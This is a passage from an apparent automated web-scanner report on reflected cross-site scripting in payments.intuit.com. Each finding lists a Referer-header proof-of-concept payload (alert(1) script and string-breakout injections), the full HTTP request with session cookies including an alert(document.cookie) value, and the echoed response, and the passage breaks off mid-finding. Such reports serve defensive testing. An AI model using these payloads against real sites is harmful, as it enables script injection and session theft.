Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:53 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Hl+omgw3mgYJwPVw-7Ka0A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:54 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96143690A0805192AA117E300DFFB9A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140382

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af';
                   </script>
...[SNIP]...

1.41. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d309'-alert(1)-'98a1572654c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=btxMA5VqwqQDHEHmDqtOzA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960424A0A0805192AA117E3CAA3A4B6
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100547

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c';
                   </script>
...[SNIP]...

1.42. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 43536--><script>alert(1)</script>5f48ddc4902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=43536--><script>alert(1)</script>5f48ddc4902

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wzoA97wyb5Q5h6Q0ZX7n2g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96081C10A0805192AA117E3B2B38A89
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100579

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=43536--><script>alert(1)</script>5f48ddc4902 | -->
...[SNIP]...

1.43. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload eb605--><script>alert(1)</script>313dcde783a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=IOOtD5FBbrudVSKv9odFBw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FDDB70A0805192AA117E38E79C1AD
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100578

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a | -->
...[SNIP]...

1.44. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 193fe'-alert(1)-'288dfdb8b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=crm5I6lOhZJyaODDHoAwfQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F93050A0805192AA117E36EB42821
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100546

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d';
                   </script>
...[SNIP]...

1.45. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71edb'-alert(1)-'6b7e8734b5b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=madTfYdoG5tkbAh6pJksTg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9615C5C0A0805192AA117E3A5FE5D3D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145458

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b';
                   </script>
...[SNIP]...

1.46. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9b18e--><script>alert(1)</script>e7e01249c3c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=9b18e--><script>alert(1)</script>e7e01249c3c

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:05 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zL8CCL7bM1jx4tivEw418w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:06 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96173AA0A0805192AA117E350D74E02
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145490

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=9b18e--><script>alert(1)</script>e7e01249c3c | -->
...[SNIP]...

1.47. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7408f'-alert(1)-'85140b02fc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

